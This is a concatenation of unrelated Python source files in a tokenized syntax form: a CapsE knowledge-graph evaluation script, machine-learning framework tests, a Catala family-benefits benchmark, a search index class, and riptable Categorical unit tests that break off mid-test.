parser=ArgumentParser("CapsE" formatter_class=ArgumentDefaultsHelpFormatter conflict_handler='resolve')<line_sep>parser.add_argument("--data" default="./data/" help="Data sources.")<line_sep>parser.add_argument("--run_folder" default="./" help="Data sources.")<line_sep>parser.add_argument("--name" default="WN18RR" help="Name of the dataset.")<line_sep>parser.add_argument("--embedding_dim" default=100 type=int help="Dimensionality of character embedding (default: 128)")<line_sep>parser.add_argument("--filter_size" default=1 type=int help="Comma-separated filter sizes (default: '3,4,5')")<line_sep>parser.add_argument("--num_filters" default=400 type=int help="Number of filters per filter size (default: 128)")<line_sep>parser.add_argument("--learning_rate" default=0.00001 type=float help="Learning rate")<line_sep>parser.add_argument("--batch_size" default=128 type=int help="Batch Size")<line_sep>parser.add_argument("--neg_ratio" default=1.0 help="Number of negative triples generated by positive (default: 1.0)")<line_sep>parser.add_argument("--useInitialization" default=<true> type=bool help="Using the pretrained embeddings")<line_sep>parser.add_argument("--num_epochs" default=51 type=int help="Number of training epochs")<line_sep>parser.add_argument("--savedEpochs" default=10 type=int help="")<line_sep>parser.add_argument("--allow_soft_placement" default=<true> type=bool help="Allow device soft device placement")<line_sep>parser.add_argument("--log_device_placement" default=<false> type=bool help="Log placement of ops on devices")<line_sep>parser.add_argument("--model_name" default='wn18rr_400_4' help="")<line_sep>parser.add_argument("--useConstantInit" action='store_true')<line_sep>parser.add_argument('--iter_routing' default=1 type=int help='number of iterations in routing algorithm')<line_sep>parser.add_argument('--num_outputs_secondCaps' default=1 type=int help='')<line_sep>parser.add_argument('--vec_len_secondCaps' default=10 type=int help='')<line_sep>parser.add_argument("--model_index" default='30')<line_sep>parser.add_argument("--num_splits" default=8 type=int)<line_sep>parser.add_argument("--testIdx" default=1 type=int help="From 0 to 7")<line_sep>parser.add_argument("--decode" action='store_false')<line_sep>args=parser.parse_args()<line_sep>print(args)<line_sep># Load data
print("Loading data...")<line_sep>train,valid,test,words_indexes,indexes_words,headTailSelector,entity2id,id2entity,relation2id,id2relation=build_data(path=args.data name=args.name)<line_sep>data_size=len(train)<line_sep>train_batch=Batch_Loader(train words_indexes indexes_words headTailSelector entity2id id2entity relation2id id2relation batch_size=args.batch_size neg_ratio=args.neg_ratio)<line_sep>entity_array=np.array(list(train_batch.indexes_ents.keys()))<line_sep>initialization=[]<if_stmt>args.useInitialization<eq><true><block_start>print("Using pre-trained initialization.")<line_sep>initialization=np.empty([len(words_indexes) args.embedding_dim]).astype(np.float32)<line_sep>initEnt,initRel=init_norm_Vector(args.data+args.name+'/relation2vec'+str(args.embedding_dim)+'.init' args.data+args.name+'/entity2vec'+str(args.embedding_dim)+'.init' args.embedding_dim)<for_stmt>_word words_indexes<block_start><if_stmt>_word<in>relation2id<block_start>index=relation2id[_word]<line_sep>_ind=words_indexes[_word]<line_sep>initialization[_ind]=initRel[index]<block_end><elif_stmt>_word<in>entity2id<block_start>index=entity2id[_word]<line_sep>_ind=words_indexes[_word]<line_sep>initialization[_ind]=initEnt[index]<block_end><else_stmt><block_start>print('*****************Error********************!')<line_sep><break><block_end><block_end>initialization=np.array(initialization dtype=np.float32)<assert_stmt>len(words_indexes)%(len(entity2id)+len(relation2id))<eq>0<block_end>print("Loading data... finished!")<line_sep>x_valid=np.array(list(valid.keys())).astype(np.int32)<line_sep>y_valid=np.array(list(valid.values())).astype(np.float32)<line_sep>len_valid=len(x_valid)<line_sep>batch_valid=int(len_valid/(args.num_splits-1))<line_sep>x_test=np.array(list(test.keys())).astype(np.int32)<line_sep>y_test=np.array(list(test.values())).astype(np.float32)<line_sep>len_test=len(x_test)<line_sep>batch_test=int(len_test/(args.num_splits-1))<line_sep># uncomment when tuning hyper-parameters on the validation set
# x_test = x_valid
# y_test = y_valid
# len_test = len_valid
# batch_test = batch_valid
##########################################
<if_stmt>args.decode<eq><false><block_start>lstModelNames=list(args.model_name.split(","))<for_stmt>_model_name lstModelNames<block_start>out_dir=os.path.abspath(os.path.join(args.run_folder "runs_CapsE" _model_name))<line_sep>print("Evaluating {}\n".format(out_dir))<line_sep>checkpoint_dir=os.path.abspath(os.path.join(out_dir "checkpoints"))<line_sep>checkpoint_prefix=os.path.join(checkpoint_dir "model")<line_sep>lstModelIndexes=list(args.model_index.split(","))<for_stmt>_model_index lstModelIndexes<block_start>_file=checkpoint_prefix+"-"+_model_index<line_sep>lstHT=[]<for_stmt>_index range(args.num_splits)<block_start><with_stmt>open(_file+'.eval.'+str(_index)+'.txt')<as>f<block_start><for_stmt>_line f<block_start><if_stmt>_line.strip()<ne>''<block_start>lstHT.append(list(map(float _line.strip().split())))<block_end><block_end><block_end><block_end>lstHT=np.array(lstHT)<line_sep>print(_file 'mr, mrr, hits@1, hits@10 --> ' np.sum(lstHT axis=0)/(2<times>len_test))<block_end>print('------------------------------------')<block_end><block_end><else_stmt><block_start><with_stmt>tf.Graph().as_default()<block_start>tf.set_random_seed(1234)<line_sep>session_conf=tf.ConfigProto(allow_soft_placement=args.allow_soft_placement log_device_placement=args.log_device_placement)<line_sep>session_conf.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=session_conf)<with_stmt>sess.as_default()<block_start>global_step=tf.Variable(0 name="global_step" trainable=<false>)<line_sep>capse=CapsE(sequence_length=x_valid.shape[1] initialization=initialization embedding_size=args.embedding_dim filter_size=args.filter_size num_filters=args.num_filters vocab_size=len(words_indexes) iter_routing=args.iter_routing batch_size=2<times>args.batch_size num_outputs_secondCaps=args.num_outputs_secondCaps vec_len_secondCaps=args.vec_len_secondCaps useConstantInit=args.useConstantInit)<line_sep># Output directory for models and summaries
lstModelNames=list(args.model_name.split(","))<for_stmt>_model_name lstModelNames<block_start>out_dir=os.path.abspath(os.path.join(args.run_folder "runs_CapsE" _model_name))<line_sep>print("Evaluating {}\n".format(out_dir))<line_sep># Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it
checkpoint_dir=os.path.abspath(os.path.join(out_dir "checkpoints"))<line_sep>checkpoint_prefix=os.path.join(checkpoint_dir "model")<line_sep>lstModelIndexes=list(args.model_index.split(","))<for_stmt>_model_index lstModelIndexes<block_start>_file=checkpoint_prefix+"-"+_model_index<line_sep>capse.saver.restore(sess _file)<line_sep>print("Loaded model" _file)<line_sep># Predict function to predict scores for test data
<def_stmt>predict x_batch y_batch writer=<none><block_start>feed_dict={capse.input_x:x_batch capse.input_y:y_batch}<line_sep>scores=sess.run([capse.predictions] feed_dict)<line_sep><return>scores<block_end><def_stmt>test_prediction x_batch y_batch head_or_tail='head'<block_start>hits10=0.0<line_sep>mrr=0.0<line_sep>mr=0.0<line_sep>hits1=0.0<for_stmt>i range(len(x_batch))<block_start>new_x_batch=np.tile(x_batch[i] (len(entity2id) 1))<line_sep>new_y_batch=np.tile(y_batch[i] (len(entity2id) 1))<if_stmt>head_or_tail<eq>'head'<block_start>new_x_batch[: 0]=entity_array<block_end><else_stmt># 'tail'
<block_start>new_x_batch[: 2]=entity_array<block_end>lstIdx=[]<for_stmt>tmpIdxTriple range(len(new_x_batch))<block_start>tmpTriple=(new_x_batch[tmpIdxTriple][0] new_x_batch[tmpIdxTriple][1] new_x_batch[tmpIdxTriple][2])<if_stmt>(tmpTriple<in>train)<or>(tmpTriple<in>valid)<or>(tmpTriple<in>test)# also remove the valid test triple
<block_start>lstIdx.append(tmpIdxTriple)<block_end><block_end>new_x_batch=np.delete(new_x_batch lstIdx axis=0)<line_sep>new_y_batch=np.delete(new_y_batch lstIdx axis=0)<line_sep># thus, insert the valid test triple again, to the beginning of the array
new_x_batch=np.insert(new_x_batch 0 x_batch[i] axis=0)# thus, the index of the valid test triple is equal to 0
new_y_batch=np.insert(new_y_batch 0 y_batch[i] axis=0)<line_sep># for running with a batch size
<while_stmt>len(new_x_batch)%((int(args.neg_ratio)+1)<times>args.batch_size)<ne>0<block_start>new_x_batch=np.append(new_x_batch [x_batch[i]] axis=0)<line_sep>new_y_batch=np.append(new_y_batch [y_batch[i]] axis=0)<block_end>results=[]<line_sep>listIndexes=range(0 len(new_x_batch) (int(args.neg_ratio)+1)<times>args.batch_size)<for_stmt>tmpIndex range(len(listIndexes)-1)<block_start>results=np.append(results predict(new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex+1]] new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex+1]]))<block_end>results=np.append(results predict(new_x_batch[listIndexes[-1]:] new_y_batch[listIndexes[-1]:]))<line_sep>results=np.reshape(results -1)<line_sep>results_with_id=rankdata(results method='ordinal')<line_sep>_filter=results_with_id[0]<line_sep>mr<augadd>_filter<line_sep>mrr<augadd>1.0/_filter<if_stmt>_filter<le>10<block_start>hits10<augadd>1<block_end><if_stmt>_filter<eq>1<block_start>hits1<augadd>1<block_end><block_end><return>np.array([mr mrr hits1 hits10])<block_end><if_stmt>args.testIdx<l>(args.num_splits-1)<block_start>head_results=test_prediction(x_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] y_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] head_or_tail='head')<line_sep>tail_results=test_prediction(x_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] y_test[batch_test<times>args.testIdx:batch_test<times>(args.testIdx+1)] head_or_tail='tail')<block_end><else_stmt><block_start>head_results=test_prediction(x_test[batch_test<times>args.testIdx:len_test] y_test[batch_test<times>args.testIdx:len_test] head_or_tail='head')<line_sep>tail_results=test_prediction(x_test[batch_test<times>args.testIdx:len_test] y_test[batch_test<times>args.testIdx:len_test] head_or_tail='tail')<block_end>wri=open(_file+'.eval.'+str(args.testIdx)+'.txt' 'w')<for_stmt>_val head_results<block_start>wri.write(str(_val)+' ')<block_end>wri.write('\n')<for_stmt>_val tail_results<block_start>wri.write(str(_val)+' ')<block_end>wri.write('\n')<line_sep>wri.close()<block_end><block_end><block_end><block_end><block_end>
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test Cases for PoolingEncoder.
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_from_stmt>seq2seq.encoders PoolingEncoder<class_stmt>PoolingEncoderTest(tf.test.TestCase)<block_start>"""
Tests the PoolingEncoder class.
"""<def_stmt>setUp self<block_start>super(PoolingEncoderTest self).setUp()<line_sep>self.batch_size=4<line_sep>self.sequence_length=16<line_sep>self.input_depth=10<line_sep>self.mode=tf.contrib.learn.ModeKeys.TRAIN<block_end><def_stmt>_test_with_params self params<block_start>"""Tests the encoder with a given parameter configuration"""<line_sep>inputs=tf.random_normal([self.batch_size self.sequence_length self.input_depth])<line_sep>example_length=tf.ones(self.batch_size dtype=tf.int32)<times>self.sequence_length<line_sep>encode_fn=PoolingEncoder(params self.mode)<line_sep>encoder_output=encode_fn(inputs example_length)<with_stmt>self.test_session()<as>sess<block_start>sess.run(tf.global_variables_initializer())<line_sep>encoder_output_=sess.run(encoder_output)<block_end>np.testing.assert_array_equal(encoder_output_.outputs.shape [self.batch_size self.sequence_length self.input_depth])<line_sep>np.testing.assert_array_equal(encoder_output_.attention_values.shape [self.batch_size self.sequence_length self.input_depth])<line_sep>np.testing.assert_array_equal(encoder_output_.final_state.shape [self.batch_size self.input_depth])<block_end><def_stmt>test_encode_with_pos self<block_start>self._test_with_params({"position_embeddings.enable":<true> "position_embeddings.num_positions":self.sequence_length})<block_end><def_stmt>test_encode_without_pos self<block_start>self._test_with_params({"position_embeddings.enable":<false> "position_embeddings.num_positions":0})<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>tf.test.main()<block_end>
|
#!python3
<import_from_stmt>datetime date<import_from_stmt>src.allocations_familiales PriseEnCharge_Code Collectivite_Code<import_from_stmt>src.api allocations_familiales Enfant<import_from_stmt>src.catala LogEvent LogEventCode reset_log retrieve_log<import_stmt>timeit<import_stmt>argparse<import_from_stmt>typing List Any<import_from_stmt>termcolor colored<def_stmt>call_allocations_familiales <arrow>float<block_start><return>allocations_familiales(date_courante=date(2020 4 20) enfants=[Enfant(id=0 remuneration_mensuelle=0 date_de_naissance=date(2003 2 2) prise_en_charge=PriseEnCharge_Code.EffectiveEtPermanente a_deja_ouvert_droit_aux_allocations_familiales=<true>) Enfant(id=1 remuneration_mensuelle=300 date_de_naissance=date(2013 9 30) prise_en_charge=PriseEnCharge_Code.GardeAlterneePartageAllocations a_deja_ouvert_droit_aux_allocations_familiales=<true>)] ressources_menage=30000 residence=Collectivite_Code.Metropole personne_charge_effective_permanente_est_parent=<true> personne_charge_effective_permanente_remplit_titre_I=<true> )<block_end><def_stmt>benchmark_iteration <block_start>money_given=call_allocations_familiales()<assert_stmt>(money_given<eq>99.37)<block_end><def_stmt>run_with_log <arrow>List[LogEvent]<block_start>money_given=call_allocations_familiales()<assert_stmt>(money_given<eq>99.37)<line_sep>log=retrieve_log()<line_sep>reset_log()<line_sep><return>log<block_end><def_stmt>print_value v:Any<arrow>str<block_start><if_stmt>isinstance(v list)<block_start><return>"["+",".join([str(x)<for>x v])+"]"<block_end><else_stmt><block_start><return>str(v)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='French law library in Python')<line_sep>parser.add_argument('action' metavar='ACTION' type=str nargs=1 help="'bench' or 'show_log'")<line_sep>args=parser.parse_args()<line_sep>action=args.action[0]<if_stmt>action<eq>"bench"<block_start>iterations=10000<line_sep>print("Iterating {} iterations of the family benefits computation. Total time (s):".format(iterations))<line_sep>print(timeit.timeit(benchmark_iteration number=iterations))<block_end><elif_stmt>action<eq>"show_log"<block_start>log=run_with_log()<line_sep>indentation=0<for_stmt>log_event log<block_start><if_stmt>log_event.code<eq>LogEventCode.BeginCall<block_start>print("{}{} {}".format("".ljust(indentation) colored("Begin call:" "yellow") colored(" >> ".join(log_event.payload) "magenta")))<line_sep># type: ignore
indentation<augadd>2<block_end><elif_stmt>log_event.code<eq>LogEventCode.EndCall<block_start>indentation<augsub>2<line_sep>print("{}{} {}".format("".ljust(indentation) colored("End call:" "yellow") colored(" >> ".join(log_event.payload) "magenta")))<line_sep># type: ignore
<block_end><elif_stmt>log_event.code<eq>LogEventCode.VariableDefinition<block_start>headings,value=log_event.payload# type: ignore
print("{}{} {} {} {}".format("".ljust(indentation) colored("Variable definition:" "blue") colored(" >> ".join(headings) "magenta") colored(":=" "blue") colored(print_value(value) "green")))<line_sep># type: ignore
<block_end><elif_stmt>log_event.code<eq>LogEventCode.DecisionTaken<block_start>print("{}{} {}".format("".ljust(indentation) colored("Decision taken:" "green") colored("{}".format(log_event.payload) "magenta")))<line_sep># type: ignore
<block_end><block_end><block_end><else_stmt><block_start>print("Action '{}' not recognized!".format(action))<line_sep>exit(-1)<block_end><block_end>
|
<import_stmt>torch.nn<as>nn<class_stmt>RNNDropout(nn.Dropout)<block_start>"""Dropout for RNN."""<def_stmt>forward self sequences_batch<block_start>"""Masking whole hidden vector for tokens."""<line_sep># B: batch size
# L: sequence length
# D: hidden size
# sequence_batch: BxLxD
ones=sequences_batch.data.new_ones(sequences_batch.shape[0] sequences_batch.shape[-1])<line_sep>dropout_mask=nn.functional.dropout(ones self.p self.training inplace=<false>)<line_sep><return>dropout_mask.unsqueeze(1)<times>sequences_batch<block_end><block_end>
|
<import_from_stmt>caffe2.python core<import_from_stmt>hypothesis given<import_stmt>caffe2.python.hypothesis_test_util<as>hu<import_stmt>hypothesis.strategies<as>st<import_stmt>numpy<as>np<class_stmt>TestLars(hu.HypothesisTestCase)<block_start>@given(offset=st.floats(min_value=0 max_value=100) lr_min=st.floats(min_value=1e-8 max_value=1e-6) **hu.gcs)<def_stmt>test_lars self offset lr_min dc gc<block_start>X=np.random.rand(6 7 8 9).astype(np.float32)<line_sep>dX=np.random.rand(6 7 8 9).astype(np.float32)<line_sep>wd=np.array([1e-4]).astype(np.float32)<line_sep>trust=np.random.rand(1).astype(np.float32)<line_sep>lr_max=np.random.rand(1).astype(np.float32)<def_stmt>ref_lars X dX wd trust lr_max<block_start>rescale_factor=trust/(np.linalg.norm(dX)/np.linalg.norm(X)+wd+offset)<line_sep>rescale_factor=np.minimum(rescale_factor lr_max)<line_sep>rescale_factor=np.maximum(rescale_factor lr_min)<line_sep><return>[rescale_factor]<block_end>op=core.CreateOperator("Lars" ["X" "dX" "wd" "trust" "lr_max"] ["rescale_factor"] offset=offset lr_min=lr_min )<line_sep>self.assertReferenceChecks(device_option=gc op=op inputs=[X dX wd trust lr_max] reference=ref_lars)<block_end><block_end>
|
<import_from_stmt>waliki.models Page<import_from_stmt>haystack indexes<class_stmt>PageIndex(indexes.SearchIndex indexes.Indexable)<block_start>text=indexes.CharField(document=<true> use_template=<true>)<def_stmt>get_model self<block_start><return>Page<block_end><block_end>
|
<import_stmt>pytest<import_stmt>os<import_stmt>pandas<as>pd<import_stmt>riptable<as>rt<import_from_stmt>enum IntEnum<import_from_stmt>numpy.testing assert_array_equal<import_from_stmt>riptable *<import_from_stmt>riptable save_sds load_sds<import_from_stmt>riptable FastArray Categorical CatZero<import_from_stmt>riptable.rt_categorical Categories<import_from_stmt>riptable.rt_enum INVALID_DICT <import_from_stmt>riptable.rt_enum DisplayLength DisplayJustification DisplayColumnColors <import_from_stmt>riptable.rt_enum CategoryMode TypeRegister<import_from_stmt>riptable.rt_numpy isnan isnotnan arange ones<import_from_stmt>riptable.tests.test_utils get_categorical_data_factory_method get_all_categorical_data <import_from_stmt>riptable.rt_sds SDSMakeDirsOn<import_from_stmt>riptable.tests.utils LikertDecision<line_sep># change to true since we write into /tests directory
SDSMakeDirsOn()<line_sep>three_unicode=np.array(["AAPL\u2080" "AMZN\u2082" "IBM\u2081"])<line_sep>three_bytes=FastArray([b'a' b'b' b'c'])<line_sep>three_ints=FastArray([1 2 3])<line_sep>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__']<line_sep>int_success=[np.array([<true> <false> <true>]) # ne
np.array([<false> <true> <false>]) # eq
np.array([<false> <true> <true>]) # ge
np.array([<false> <false> <true>]) # gt
np.array([<true> <true> <false>]) # le
np.array([<true> <false> <false>]) # lt
]<line_sep>same_success=[np.array([<false> <false> <false>]) # ne
np.array([<true> <true> <true>]) # eq
np.array([<true> <true> <true>]) # ge
np.array([<false> <false> <false>]) # gt
np.array([<true> <true> <true>]) # le
np.array([<false> <false> <false>]) # lt
]<line_sep>diff_success=[np.array([<true> <false> <true>]) # ne
np.array([<false> <true> <false>]) # eq
np.array([<false> <true> <false>]) # ge
np.array([<false> <false> <false>]) # gt
np.array([<true> <true> <true>]) # le
np.array([<true> <false> <true>]) # lt
]<line_sep>ShowCompareInfo=<false><line_sep>list_bytes=[b'b' b'b' b'a' b'd' b'c']<line_sep>list_unicode=['b' 'b' 'a' 'd' 'c']<line_sep>list_true_unicode=[u'b\u2082' u'b\u2082' u'a\u2082' u'd\u2082' u'c\u2082']<line_sep>decision_dict=dict(zip(LikertDecision.__members__.keys() [int(v)<for>v LikertDecision.__members__.values()] ))<def_stmt>array_equal arr1 arr2<block_start>subr=arr1-arr2<line_sep>sumr=sum(subr<eq>0)<line_sep>result=sumr<eq>len(arr1)<if_stmt><not>result<block_start>print("array comparison failed" arr1 arr2)<block_end><return>result<block_end><class_stmt>TestCategorical<block_start><def_stmt>_notimpl self<block_start>pytest.skip("This test needs to be implemented.")<block_end><def_stmt>test_constructor self# from pandas categorical
# from single parameter
# from two parameters
# ndarray
# python list
<block_start>self._notimpl()<block_end><def_stmt>test_ctor_list self<block_start>c_bytes=Categorical(list_bytes)<assert_stmt>c_bytes.dtype<eq>np.int8 f"Dtype {c_bytes.dtype} was not correct for construction from small list."<assert_stmt>len(c_bytes)<eq>5 f"Length of underlying index array was incorrect for construction from bytes."<line_sep>unique_bytes=np.unique(list_bytes)<assert_stmt>np.all(c_bytes._categories_wrap._list<eq>unique_bytes) f"Categories did not generate a unique list of categories from input bytes list."<line_sep>c_unicode=Categorical(list_unicode)<assert_stmt>c_unicode.dtype<eq>np.int8 f"Dtype {c_unicode.dtype} was not correct for construction from small list."<assert_stmt>len(c_unicode)<eq>5 f"Length of underlying index array was incorrect for construction from unicode."<assert_stmt>(len(c_unicode._categories_wrap)<eq>4) f"Length of unique categories was incorrect for construction from unicode."<assert_stmt>(c_unicode._categories_wrap._list[0]<eq>b'a') f"Unique categories were not sorted for construction from unicode."<assert_stmt>c_unicode._categories_wrap._list.dtype.char<eq>'S' f"Unicode strings were not flipped to byte strings."<line_sep>c_true_unicode=Categorical(list_true_unicode)<assert_stmt>(c_true_unicode.dtype<eq>np.int8) f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."<assert_stmt>(len(c_true_unicode)<eq>5) f"Length of underlying index array was incorrect for construction from true unicode."<assert_stmt>(len(c_true_unicode._categories_wrap)<eq>4) f"Length of unique categories was incorrect for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list[0]<eq>u'a\u2082') f"Unique categories were not sorted for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list.dtype.char<eq>'U') f"Unicode strings were not flipped to byte strings."<block_end><def_stmt>test_ctor_nparray self<block_start>c_bytes=Categorical(np.array(list_bytes))<assert_stmt>c_bytes.dtype<eq>np.int8 f"Dtype {c_bytes.dtype} was not correct for construction from small list."<assert_stmt>len(c_bytes)<eq>5 f"Length of underlying index array was incorrect for construction from bytes."<line_sep>unique_bytes=np.unique(list_bytes)<assert_stmt>np.all(c_bytes._categories_wrap._list<eq>unique_bytes) f"Categories did not generate a unique list of categories from input bytes list."<line_sep>c_unicode=Categorical(np.array(list_unicode))<assert_stmt>c_unicode.dtype<eq>np.int8 f"Dtype {c_unicode.dtype} was not correct for construction from small list."<assert_stmt>len(c_unicode)<eq>5 f"Length of underlying index array was incorrect for construction from unicode."<assert_stmt>(len(c_unicode._categories_wrap._list)<eq>4) f"Length of unique categories was incorrect for construction from unicode."<assert_stmt>(c_unicode._categories_wrap._list[0]<eq>b'a') f"Unique categories were not sorted for construction from unicode."<assert_stmt>c_unicode._categories_wrap._list.dtype.char<eq>'S' f"Unicode strings were not flipped to byte strings."<line_sep>c_true_unicode=Categorical(np.array(list_true_unicode))<assert_stmt>(c_true_unicode.dtype<eq>np.int8) f"Dtype {c_true_unicode.dtype} was not correct for construction from small list."<assert_stmt>(len(c_true_unicode)<eq>5) f"Length of underlying index array was incorrect for construction from true unicode."<assert_stmt>(len(c_true_unicode._categories_wrap._list)<eq>4) f"Length of unique categories was incorrect for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list[0]<eq>u'a\u2082') f"Unique categories were not sorted for construction from true unicode."<assert_stmt>(c_true_unicode._categories_wrap._list.dtype.char<eq>'U') f"Unicode strings were not flipped to byte strings."<block_end><def_stmt>test_ctor_values_and_cats self<block_start>v_bytes=[b'IBM' b'AAPL' b'AMZN' b'IBM' b'hello']<line_sep>v_str=['IBM' 'AAPL' 'AMZN' 'IBM' 'hello']<line_sep>v_true=[u'IBM\u2082' u'AAPL\u2082' u'AMZN\u2082' u'IBM\u2082' u'hello\u2082' ]<line_sep>c_bytes=[b'AAPL' b'AMZN' b'IBM']<line_sep>c_str=['AAPL' 'AMZN' 'IBM']<line_sep>c_true=[u'AAPL\u2082' u'AMZN\u2082' u'IBM\u2082']<line_sep>v_correct=[2 0 1 2 3]<line_sep>c_correct=[b'AAPL' b'AMZN' b'IBM' b'inv']<line_sep>valid_v=[v_bytes v_str np.array(v_bytes) np.array(v_str) FastArray(v_bytes) FastArray(v_str) ]<line_sep>valid_c=[c_bytes c_str np.array(c_bytes) np.array(c_str) FastArray(c_bytes) FastArray(c_str) ]<for_stmt>v valid_v<block_start>vdt=<none><if_stmt>hasattr(v 'dtype')<block_start>vdt=v.dtype<block_end><else_stmt><block_start>vdt=type(v)<block_end><for_stmt>c valid_c<block_start>cdt=<none><if_stmt>hasattr(c 'dtype')<block_start>cdt=c.dtype<block_end><else_stmt><block_start>cdt=type(c)<block_end># error if no invalid provided
<with_stmt>pytest.raises(ValueError)<block_start>cat=Categorical(v c)<block_end># accept invalid and correctly assign
# cat = Categorical(v, c, invalid_category=b'inv')
# self.assertEqual(cat._categories.dtype.char, 'S', msg=f"Categorical from v: {vdt} and c: {cdt} did not flip categories to bytestring")
# v_is_correct = bool(np.all(v_correct == cat.view(FastArray)))
# self.assertTrue(v_is_correct, msg=f"Did not create the correct underlying index array from v: {vdt} and c: {cdt}")
# c_is_correct = bool(np.all(c_correct == cat._categories))
# self.assertTrue(c_is_correct, msg=f"Did not create the correct categories from v: {vdt} and c: {cdt}")
<block_end><block_end># v = v_true
# vdt = "TRUE unicode"
# for c in valid_c:
# if hasattr(c,'dtype'):
# cdt = c.dtype
# else:
# cdt = type(c)
# cat = Categorical(v,c)
<block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_bad_index self<block_start>idx_list=[1 2 3 4 5]<line_sep>str_list=['a' 'b']<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(idx_list str_list)<block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_non_unique self<block_start>'''
riptable categoricals, like pandas categoricals, do not allow a non-unique list of categories when an index array is provided.
'''<line_sep>idx_list=[0 1]<line_sep>str_list=['b' 'b' 'a']<line_sep>c=Categorical(idx_list str_list)<block_end># ---------------------------------------------------------------------------
<def_stmt>test_ctor_enum self<block_start>codes=[1 44 44 133 75]<line_sep>c=Categorical(codes LikertDecision)<block_end># ---------------------------------------------------------------------------
<def_stmt>test_compare_enum_int self<block_start>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__' ]<line_sep>codes=[1 44 44 133 75]<line_sep>valid_idx=44<line_sep>bad_idx=43<line_sep>valid_idx_correct=[FastArray([<true> <false> <false> <true> <true>]) FastArray([<false> <true> <true> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <true> <true>]) FastArray([<true> <true> <true> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<line_sep>bad_idx_correct=[FastArray([<true> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<true> <false> <false> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<for_stmt>d (LikertDecision decision_dict)<block_start>c=Categorical(codes d)<line_sep># test valid integer code
<for_stmt>name,correct zip(compare_func_names valid_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(valid_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>(was_correct) f"Categorical enum comparison failed with good integer index on {name} operation. {c.view(FastArray)} code: {valid_idx}"<block_end># test invalid integer code
<for_stmt>name,correct zip(compare_func_names bad_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(bad_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>was_correct f"Categorical enum comparison failed with good integer index on {name} operation"<block_end><block_end><block_end># ---------------------------------------------------------------------------
<def_stmt>test_compare_enum_str self<block_start>compare_func_names=['__ne__' '__eq__' '__ge__' '__gt__' '__le__' '__lt__' ]<line_sep>codes=[1 44 44 133 75]<line_sep>valid_idx='StronglyAgree'<line_sep>bad_idx='x'<line_sep>valid_idx_correct=[FastArray([<true> <false> <false> <true> <true>]) FastArray([<false> <true> <true> <false> <false>]) FastArray([<false> <true> <true> <true> <true>]) FastArray([<false> <false> <false> <true> <true>]) FastArray([<true> <true> <true> <false> <false>]) FastArray([<true> <false> <false> <false> <false>]) ]<for_stmt>d (LikertDecision decision_dict)<block_start>c=Categorical(codes d)<line_sep># test valid category string
<for_stmt>name,correct zip(compare_func_names valid_idx_correct)<block_start>func=c.__getattribute__(name)<line_sep>result=func(valid_idx)<line_sep>was_correct=bool(np.all(correct<eq>result))<assert_stmt>was_correct f"Categorical enum comparison failed with good category string on {name} operation"<block_end># test invalid category string
<for_stmt>name compare_func_names<block_start>func=c.__getattribute__(name)<with_stmt>pytest.raises(ValueError)<block_start>result=func(bad_idx)<block_end><block_end><block_end><block_end><def_stmt>test_map self<block_start>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':'AA' 'b':'BB' 'c':'CC' 'd':'DD'}<line_sep>result=c.map(mapping)<line_sep>correct=FastArray([b'BB' b'BB' b'CC' b'AA' b'DD'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping)<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':'AA' 'b':'BB' 'c':'CC'}<line_sep>result=c.map(mapping invalid='INVALID')<line_sep>correct=FastArray([b'BB' b'BB' b'CC' b'AA' b'INVALID'])<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false> base_index=0)<line_sep>result=c.map(mapping invalid='INVALID')<assert_stmt>bool(np.all(result<eq>correct))<line_sep>c=Categorical(['b' 'b' 'c' 'a' 'd'] ordered=<false>)<line_sep>mapping={'a':1.0 'b':2.0 'c':3.0}<line_sep>result=c.map(mapping invalid=666)<line_sep>correct=FastArray([2.0 2.0 3.0 1.0 